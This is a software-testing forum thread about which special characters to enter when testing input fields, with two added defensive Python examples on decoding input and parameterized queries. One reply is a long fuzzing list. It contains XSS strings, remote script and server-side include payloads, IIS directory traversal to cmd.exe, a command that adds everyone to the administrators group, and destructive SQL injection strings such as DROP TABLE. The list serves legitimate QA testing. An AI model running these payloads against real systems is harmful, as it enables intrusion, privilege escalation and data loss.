51Testing Software Testing Forum
Title:
What special characters are commonly used when testing text input?
Author:
kevinll
Time:
2006-11-7 14:48
What special characters are commonly used when testing text input? I thought of: _user,
test_user_,
‘user’,
“user123\~!@#$%^&*()_+/?|{[,
Test user,
User,
 ,
What others are there?
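Author:
wuhuawu09
Time:
2006-11-7 14:59
There's - (the hyphen, on the same key as "_"), …… (the ellipsis), and also punctuation typed in Chinese input mode, special characters (—, ¥,), brackets (curly, square, round), 、 (the enumeration comma), etc.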
Author:
kevinll
Time:
2006-11-7 15:10
thx!
Author:
yangkinki
Time:
2006-11-7 16:41
~!`@#$%^&*()_+|[]-=\{};':"<>?,./~!·#¥%…&*()—+|`-=、[]{};‘:“,。/《》? These all count as special characters.
Author:
小南
Time:
2006-11-7 18:03
MSFT%22>document.write(%22This%20page%20has%20the%20HTML%20security%20bug!%22);document.close();
<TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
%3CTABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
<TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
%3CTABLE%3E%3CTR%3E%3CTD%3Ecolumn%201%20row%201%3C%2FTD%3E%3C%2FTR%3E%3C%2FTABLE%3E
<img src=javascript:alert(document.domain)>
<img src%3Djavascript:alert(document.domain)>
TABLE><TR><TD>column 1 row 1</TD><%2FTR>/TABLE>
TABLE><TR><TD>column 1 row 1</TD></TR></TABLE
TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
<TABLE><TR><TD>column 1 row 1</TD></TR></TABLE
%25%33%43TABLE><TR><TD>column 1 row 1</TD></TR></TABLE>
<!--# include virtual="http://matrixsrv4/testhack/test.inc" -->
%3C%21%2D%2D%23%20include%20virtual%3D%22http%3A%2F%2Fmatrixsrv4%2Ftesthack%2Ftest%2Einc%22%20%2D%2D%3e
<!--%23 include virtual="http://matrixsrv4/testhack/test.inc" -->
<!--# include virtual="http://matrixsrv4/testhack/test.inc
%23 include virtual="http://matrixsrv4/testhack/test.inc -->
<%@ Language=VBScript %
<%@ Language=VBScript %>
<%25@ Language=VBScript %>
<%25@ Language=VBScript %
%25%33%43%@ Language%25%33%44VBScript %>
<script language="Javascript" src="http://map.geoup.com/geoup"></script>
<script language="Javascript" src="http://map.geoup.com/geoup"><script>
script language="Javascript" src="http://map.geoup.com/geoup"></script>
<script language="Javascript" src="http://map.geoup.com/geoup"></script
%3Cscript%20language="Javascript" src="http://map.geoup.com/geoup"></script>
%3Cscript%20language="Javascript" src="http://map.geoup.com/geoup"></script
MsgBox "U R Hacked"
%25%33%43script language="Javascript" src="http://map.geoup.com/geoup"></script>
%25%33%43script language="Javascript" src="http://map.geoup.com/geoup"></script
%25%3343script language="Javascript" src="http://map.geoup.com/geoup"></script
set path=c:\hacked
http://%computername%/scripts/..%c0%af../winnt/system32/cmd.exe
net stop w3csvc
%22C:%5CDocuments%20and%20Settings%5C%25username%25%5CDesktop%5Chak.bat%22
net localgroup administrators everyone /add %3E c:\addadmin.log
Sql’’INSERT INTO database.tablename1 (column names) SELECT * FROM database.tablename2 --
Sql’’INSERT INTO database.tablename (column name, column name) '980832','yatta yatta' --
Sql’’CREATE database.tablename (table element list) --
Sql’’DROP TABLE database.tablename --
Sql’’DROP VIEW database.view --
Sql’’DROP PROCEDURE database.procedure --
Sql’’UPDATE database.tablename SET columnname = 0 --
<!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
%3C%21-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
<!-- Body -- <!ELEMENT body (tu*) > <!-- No attributes -->
!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
<!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes --
<!-- Body -- <!ELEMENT body (tu*) > %3C!-- No attributes --%3E
%25%33%43%2521-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
%3C%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D%3E
%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D%3E
%3C%21%2D%2D%20Body%20%2D%2D%3E%20%3C%21ELEMENT%20body%20%20%20%20%28tu%2A%29%20%3E%20%3C%21%2D%2D%20No%20attributes%20%2D%2D
0xF900 0xFFFE
<!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
<!-- Body --> <!ELEMENT body (tu*) > <!-- No attributes -->
#
0.23
:
%3A
\
%5C
?
%3F
*
%2A
<
%3C
>
%3E
%
0.25
/
%2F
|
%7C
"
0.22
~
%7E
lbot~/%2f?url%26
http://www:microsoft.com
http%3A%2F%2Fwww%2Emicrosoft%2Ecom
http%25%33%41%25%32%46%25%32%46www%25%32%45microsoft%25%32%45com
ftp://(enter valid address)
ftp%3A%2F%2F(enter valid address)
ftp%25%33%41%25%32%46%25%32%46(enter valid address)
file://C:\WINNT\system32\inetsrv\iisadmin\default.asp
file%3A%2F%2FC%3A%5CWINNT%5Csystem32%5Cinetsrv%5Ciisadmin%5Cdefault.asp
file%25%33%41%25%32%46%25%32%46C%25%33%41%25%35%43WINNT%25%35%43system32%25%35%43inetsrv%25%35%43iisadmin%25%35%43default%25%32%45asp
https://(enter valid https address)
http%73%3A%2F%2F(enter valid https address)
http%25%73%25%33%41%25%32%46%25%32%46(enter valid https address)
gopher://(enter valid address)
telnet (enter address)
mailto://aaronspa@microsoft.com
mailto%3A%2F%2Faaronspa%40microsoft%2Ecom
mailto%25%33%41%25%32%46%25%32%46Caaronspa%2540microsoft%25%32%45com
news://(newsgroup)
http:://www.microsoft.com
http%3A%3A%2F%2Fwww%2Emicrosoft%2Ecom
http://www:microsoft.com
http%3A%2F%2Fwww%3Amicrosoft%2Ecom
http:/www.microsoft-com
http%3A%2Fwww%2Emicrosoft%2Dcom
http//microsoft.com
http%2F%2Fmicrosoft%2Ecom
http://.microsoft.com
http%3A%2F%2F%2Emicrosoft%2Ecom
http://microsoft..com
http%3A%2F%2Fmicrosoft%2E%2Ecom
file://C::\WINNT\system32\inetsrv\iisadmin\defaul.aspt
file://C:\WINNT\system32\inetsrv\iisadmin\defaul.text
file://C:\WINNT\system32\inetsrv\..\iisadmin\defaul.asp
\b
%5C%62
\f
%5C%66
\n
%5C%6E
\r
%5C%72
\t
%5C%74
\'
%5C%27
\"
%5C%22
break
return:
delete
strcopy
©
®
™
Dáta
£
¥
₣
¡
ﻼ
;
%3B
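Added example, not part of the original thread: the list above repeats the same markup raw, percent-encoded once (`%3C`) and encoded twice (`%25%33%43`), so a check that runs before decoding sees three different strings. The Python sketch below decodes each value to a stable form and applies a hypothetical policy (`assess` and `MAX_LAYERS` are assumed names) that rejects multiply-encoded or invalid UTF-8 input and HTML-escapes everything else.

```python
import html
from urllib.parse import unquote

MAX_LAYERS = 4  # assumed cut-off for nested percent-encoding


def canonicalize(value):
    """Percent-decode until stable; return (text, layers_removed)."""
    layers = 0
    while layers <= MAX_LAYERS:
        decoded = unquote(value, errors="strict")  # invalid UTF-8 raises
        if decoded == value:
            return value, layers
        value, layers = decoded, layers + 1
    raise ValueError("encoding nested too deeply")


def assess(value):
    """Classify one submitted field value (hypothetical policy)."""
    try:
        text, layers = canonicalize(value)
    except ValueError as exc:  # UnicodeDecodeError is a ValueError
        return {"verdict": "reject", "reason": type(exc).__name__}
    if layers > 1:
        return {"verdict": "reject", "reason": "multiple encoding layers",
                "layers": layers}
    # Validate and store the canonical text; escape it only on output.
    return {"verdict": "accept", "layers": layers,
            "rendered": html.escape(text, quote=True)}


# Constructed sample set, reusing strings from the post above.
SAMPLES = [
    "<TABLE>",
    "%3CTABLE>",
    "%25%33%43TABLE>",
    "..%c0%af..",
    "<%@ Language=VBScript %>",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), assess(sample))
```

If the web framework has already decoded the value once, any further layer found here is one more than a normal client would send.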
Author:
loveryanli
Time:
2006-11-7 19:17
Whenever a Sybase database query is involved, entering ' is guaranteed to produce an error; it works every time, heh.
Author:
kevinll
Time:
2006-11-8 11:15
小南: I don't quite understand what you mean.
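Author:
wuhuawu09
Time:
2006-11-8 11:32
Maybe 小南 is telling you the characters used by various languages (including statements used by databases) and other escape characters.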
Author:
nightbossa
Time:
2006-11-8 16:29
Thanks, 小南. Bookmarking this first...
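Author:
getfly
Time:
2007-10-24 15:20
Whenever a Sybase database query is involved, entering ' is guaranteed to produce an error; it works every time.
This is so true. How did I never notice before that this character is so useful?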
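Added example, not code from the thread: the error described above appears when the quote is pasted into the SQL text and ends the string literal early. This sketch uses Python's built-in sqlite3 as a stand-in for Sybase (an assumption; the table and function names are hypothetical) to show the failing query next to the parameterized form, which treats `'` as plain data.

```python
import sqlite3


def make_db():
    """Build a small in-memory table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?)",
                     [("kevin",), ("O'Brien",)])
    return conn


def find_concatenated(conn, name):
    """The 'before': user input is pasted into the SQL text."""
    sql = "SELECT name FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def find_parameterized(conn, name):
    """The fix: the driver passes the value separately from the SQL text."""
    return [row[0] for row in conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,))]


def probe(conn, finder, name):
    """Return the rows, or the error class name if the query failed."""
    try:
        return finder(conn, name)
    except sqlite3.Error as exc:
        return type(exc).__name__


if __name__ == "__main__":
    db = make_db()
    for value in ["kevin", "'", "O'Brien"]:
        print(repr(value),
              "concatenated:", probe(db, find_concatenated, value),
              "parameterized:", probe(db, find_parameterized, value))
```

A database error on a lone `'` in a test run is therefore a sign that the field is being concatenated into a query and should be moved to bound parameters.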
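Author:
zhang1987yuan
Time:
2009-5-6 16:41
Title:
Shouldn't special characters be categorized according to the specific case???
I'm a newbie, but I wonder whether special-character input should be divided up according to different requirements?? For example, username input versus date input.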
Welcome to 51Testing Software Testing Forum (http://bbs.51testing.com/)